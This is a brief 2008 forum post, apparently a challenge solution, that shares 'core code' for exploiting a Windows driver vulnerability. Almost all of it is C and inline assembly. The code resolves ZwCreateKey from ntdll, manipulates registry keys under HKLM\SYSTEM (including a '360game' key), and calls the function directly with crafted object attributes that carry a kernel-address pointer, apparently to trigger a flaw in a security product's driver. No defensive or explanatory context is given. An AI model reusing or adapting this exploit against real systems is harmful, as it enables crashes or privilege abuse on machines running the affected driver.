[Share] Solution to Problem 3
2008-12-23 08:26
Exploiting the driver's vulnerability:
Core code:
HKEY hkey=(HKEY)"360game";
WCHAR xx[] = L"xxxx_fuck";
HMODULE hlib = LoadLibrary("ntdll.dll");
PVOID p = GetProcAddress(hlib , "ZwCreateKey");
RegOpenKey(HKEY_LOCAL_MACHINE , "SYSTEM\\" , &hkey);
OBJECT_ATTRIBUTES oba ;
UNICODE_STRING strname ;
strname.Buffer = xx;
strname.Length = wcslen(strname.Buffer) * sizeof(WCHAR) ;
InitializeObjectAttributes(&oba , &strname ,0 , 0,(PVOID)0x80000000);
RegDeleteKey(hkey,"360game");
__asm{
push 0
push 0
push 0
push 0
lea eax,oba
push eax
push 0
push 0
call p
}